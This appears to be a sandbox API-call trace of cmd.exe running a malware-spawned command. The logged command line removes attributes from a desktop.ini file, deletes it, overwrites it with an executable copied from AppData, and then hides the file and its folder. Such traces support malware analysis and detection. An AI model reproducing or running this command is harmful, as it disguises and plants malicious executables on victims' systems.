861 os_tid = 0x9ac [0232.536] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1eff34 | out: lpSystemTimeAsFileTime=0x1eff34*(dwLowDateTime=0xbe2816c0, dwHighDateTime=0x1d440a9)) [0232.537] GetCurrentProcessId () returned 0x9bc [0232.537] GetCurrentThreadId () returned 0x9ac [0232.537] GetTickCount () returned 0x3ff73 [0232.537] QueryPerformanceCounter (in: lpPerformanceCount=0x1eff2c | out: lpPerformanceCount=0x1eff2c*=28932581496) returned 1 [0232.537] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0232.537] __set_app_type (_Type=0x1) [0232.537] __p__fmode () returned 0x76b331f4 [0232.537] __p__commode () returned 0x76b331fc [0232.538] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0232.538] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0232.538] GetCurrentThreadId () returned 0x9ac [0232.538] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9ac) returned 0x38 [0232.538] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.538] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0232.538] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.564] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0232.564] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efec4 | out: phkResult=0x1efec4*=0x0) returned 0x2 [0232.564] VirtualQuery (in: lpAddress=0x1efefb, lpBuffer=0x1efe94, dwLength=0x1c | out: lpBuffer=0x1efe94*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0232.564] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efe94, dwLength=0x1c | out: lpBuffer=0x1efe94*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0232.565] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efe94, dwLength=0x1c | out: lpBuffer=0x1efe94*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0232.565] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efe94, dwLength=0x1c | out: lpBuffer=0x1efe94*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0232.565] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efe94, dwLength=0x1c | out: lpBuffer=0x1efe94*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0232.565] GetConsoleOutputCP () returned 0x1b5 [0232.566] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.566] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0232.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.566] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0232.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.566] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.566] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.566] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.567] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.567] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.567] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0232.567] GetEnvironmentStringsW () returned 0x3b06a8* [0232.567] FreeEnvironmentStringsW (penv=0x3b06a8) returned 1 [0232.567] GetEnvironmentStringsW () returned 0x3b06a8* [0232.568] FreeEnvironmentStringsW (penv=0x3b06a8) returned 1 [0232.568] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eee34 | out: phkResult=0x1eee34*=0x40) returned 0x0 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x0, lpData=0x1eee40*=0x50, lpcbData=0x1eee38*=0x1000) returned 0x2 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x4, lpData=0x1eee40*=0x1, lpcbData=0x1eee38*=0x4) returned 0x0 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x0, lpData=0x1eee40*=0x1, lpcbData=0x1eee38*=0x1000) returned 0x2 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x4, lpData=0x1eee40*=0x0, lpcbData=0x1eee38*=0x4) returned 0x0 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x4, lpData=0x1eee40*=0x40, lpcbData=0x1eee38*=0x4) returned 0x0 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x4, lpData=0x1eee40*=0x40, lpcbData=0x1eee38*=0x4) returned 0x0 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x0, lpData=0x1eee40*=0x40, lpcbData=0x1eee38*=0x1000) returned 0x2 [0232.568] RegCloseKey (hKey=0x40) returned 0x0 [0232.568] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eee34 | out: phkResult=0x1eee34*=0x40) returned 0x0 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x0, lpData=0x1eee40*=0x40, lpcbData=0x1eee38*=0x1000) returned 0x2 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x4, lpData=0x1eee40*=0x1, lpcbData=0x1eee38*=0x4) returned 0x0 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x0, lpData=0x1eee40*=0x1, lpcbData=0x1eee38*=0x1000) returned 0x2 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x4, lpData=0x1eee40*=0x0, lpcbData=0x1eee38*=0x4) returned 0x0 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x4, lpData=0x1eee40*=0x9, lpcbData=0x1eee38*=0x4) returned 0x0 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x4, lpData=0x1eee40*=0x9, lpcbData=0x1eee38*=0x4) returned 0x0 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x0, lpData=0x1eee40*=0x9, lpcbData=0x1eee38*=0x1000) returned 0x2 [0232.569] RegCloseKey (hKey=0x40) returned 0x0 [0232.569] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c0 [0232.569] srand (_Seed=0x5b8863c0) [0232.569] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\"" [0232.569] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\"" [0232.569] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.569] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b06b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0232.570] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0232.570] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0232.570] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0232.570] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0232.570] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0232.570] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0232.570] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0232.570] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0232.570] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0232.570] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0232.570] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0232.570] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0232.570] GetEnvironmentStringsW () returned 0x3b25e0* [0232.570] FreeEnvironmentStringsW (penv=0x3b25e0) returned 1 [0232.570] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.570] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0232.570] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0232.570] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0232.570] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0232.570] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0232.571] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0232.571] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0232.571] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0232.571] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0232.571] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1efc00 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.571] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1efc00, lpFilePart=0x1efbfc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1efbfc*="Desktop") returned 0x18 [0232.571] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.571] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef97c | out: lpFindFileData=0x1ef97c) returned 0x3b10a0 [0232.571] FindClose (in: hFindFile=0x3b10a0 | out: hFindFile=0x3b10a0) returned 1 [0232.571] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef97c | out: lpFindFileData=0x1ef97c) returned 0x3b10a0 [0232.571] FindClose (in: hFindFile=0x3b10a0 | out: hFindFile=0x3b10a0) returned 1 [0232.572] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef97c | out: lpFindFileData=0x1ef97c) returned 0x3b10a0 [0232.572] FindClose (in: hFindFile=0x3b10a0 | out: hFindFile=0x3b10a0) returned 1 [0232.572] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.572] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0232.572] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0232.572] GetEnvironmentStringsW () returned 0x3b08c0* [0232.572] FreeEnvironmentStringsW (penv=0x3b08c0) returned 1 [0232.572] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.573] GetConsoleOutputCP () returned 0x1b5 [0232.761] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.761] GetUserDefaultLCID () returned 0x409 [0232.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0232.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efd40, cchData=128 | out: lpLCData="0") returned 2 [0232.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efd40, cchData=128 | out: lpLCData="0") returned 2 [0232.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efd40, cchData=128 | out: lpLCData="1") returned 2 [0232.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0232.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0232.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0232.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0232.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0232.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0232.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0232.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0232.762] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0232.762] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0232.762] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0232.763] GetConsoleTitleW (in: lpConsoleTitle=0x3a0c20, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.763] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.763] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.763] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.763] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.764] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0232.764] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0232.764] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0232.764] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0232.764] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0232.764] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0232.764] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0232.767] _wcsicmp (_String1="del", _String2=")") returned 59 [0232.767] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0232.767] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0232.767] _wcsicmp (_String1="IF", _String2="del") returned 5 [0232.767] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0232.767] _wcsicmp (_String1="REM", _String2="del") returned 14 [0232.767] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0232.769] _wcsicmp (_String1="type", _String2=")") returned 75 [0232.769] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0232.770] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0232.770] _wcsicmp (_String1="IF", _String2="type") returned -11 [0232.770] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0232.770] _wcsicmp (_String1="REM", _String2="type") returned -2 [0232.770] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0232.773] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0232.773] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0232.777] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0232.778] FindClose (in: hFindFile=0x3b0dc8 | out: hFindFile=0x3b0dc8) returned 1 [0232.778] FindClose (in: hFindFile=0x3b0dc8 | out: hFindFile=0x3b0dc8) returned 1 [0232.778] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0232.778] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0232.778] GetConsoleTitleW (in: lpConsoleTitle=0x1ef768, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.778] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef5f0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef6b8 | out: lpAttributeList=0x1ef5f0, lpSize=0x1ef6b8) returned 1 [0232.778] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef5f0, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef6b0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef5f0, lpPreviousValue=0x0) returned 1 [0232.778] GetStartupInfoW (in: lpStartupInfo=0x1ef5ac | out: lpStartupInfo=0x1ef5ac*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0232.779] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0232.780] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1ef64c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef698 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" ", lpProcessInformation=0x1ef698*(hProcess=0x50, hThread=0x4c, dwProcessId=0x958, dwThreadId=0xd0)) returned 1 [0232.867] CloseHandle (hObject=0x4c) returned 1 [0232.867] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0232.867] GetEnvironmentStringsW () returned 0x3b2e00* [0232.867] FreeEnvironmentStringsW (penv=0x3b2e00) returned 1 [0232.867] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0232.918] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1ef58c | out: lpExitCode=0x1ef58c*=0x0) returned 1 [0232.918] CloseHandle (hObject=0x50) returned 1 [0232.918] _vsnwprintf (in: _Buffer=0x1ef6d4, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ef598 | out: _Buffer="00000000") returned 8 [0232.918] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0232.918] GetEnvironmentStringsW () returned 0x3b25e0* [0232.918] FreeEnvironmentStringsW (penv=0x3b25e0) returned 1 [0232.918] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0232.918] GetEnvironmentStringsW () returned 0x3b25e0* [0232.918] FreeEnvironmentStringsW (penv=0x3b25e0) returned 1 [0232.918] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef5f0 | out: lpAttributeList=0x1ef5f0) [0232.918] GetConsoleTitleW (in: lpConsoleTitle=0x1ef970, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.919] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1\\desktop.ini")) returned 0xffffffff [0232.919] GetLastError () returned 0x2 [0232.919] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1")) returned 0x10 [0232.919] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0232.919] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0232.919] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1\\desktop.ini")) returned 0xffffffff [0232.919] GetLastError () returned 0x2 [0232.919] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1ef41c | out: lpConsoleScreenBufferInfo=0x1ef41c) returned 1 [0232.920] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0232.985] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0232.985] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0232.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.986] GetFileType (hFile=0x50) returned 0x1 [0232.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.987] GetFileType (hFile=0x50) returned 0x1 [0232.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.987] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.988] GetFileType (hFile=0x50) returned 0x1 [0232.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.988] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.988] GetFileType 